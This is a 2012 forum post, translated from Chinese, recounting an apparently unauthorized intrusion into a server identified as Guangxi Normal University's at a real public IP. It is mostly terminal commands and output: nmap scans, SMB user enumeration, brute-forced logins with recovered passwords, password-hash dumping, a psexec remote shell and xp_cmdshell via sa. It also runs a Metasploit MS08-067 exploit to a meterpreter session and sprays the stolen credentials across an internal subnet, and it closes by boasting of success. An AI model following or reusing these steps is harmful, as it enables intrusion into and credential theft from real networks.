nmap + msf intrusion into Guangxi Normal University (广西师范)

Posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241

// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241

// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241

// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes

root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use the MS08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt

test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt

44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254

// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful; a simple msf + nmap attack~~
